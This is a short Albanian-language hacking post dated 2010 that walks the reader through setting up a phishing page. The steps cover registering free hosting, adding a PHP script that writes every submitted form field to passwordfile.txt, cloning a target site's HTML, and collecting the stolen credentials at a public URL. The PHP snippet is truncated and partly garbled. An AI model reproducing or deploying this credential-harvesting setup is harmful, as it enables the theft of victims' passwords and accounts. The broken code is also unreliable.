click play
Se pari duhet te hapni nje host. Une ju sugjeroj ripway pasi e perdor dhe vete. Krijoni nje account, pra sign up me pas shkoni tek file managent dhe fshini filen me emrin index.htm krijoni nje file tjeter me emrin write.php dhe beji copy paste kesaj: 

$value) { fwrite($handle, $variable);
 fwrite($handle, "=");
 fwrite($handle, $value);
 fwrite($handle, "rn");
 } fwrite($handle, "rn");
 fclose($handle);
 exit;
 ?> 


Me pas bejeni save me. Pastaj krijoni nje file tjeter me emrin index.html dhe faqes qe doni ti beni phishing beji view source dhe copy paste ne tekst me pas save me pas krijoni nje file me emer passwordfile.txt me tekst bosh dhe u be me pas adresa juaj e phishing do te jete http://www.yourdomain.700megs.com/passwordfile.txt

|Copyright © 2010 | Nardy | Design © Hacker-Nardy|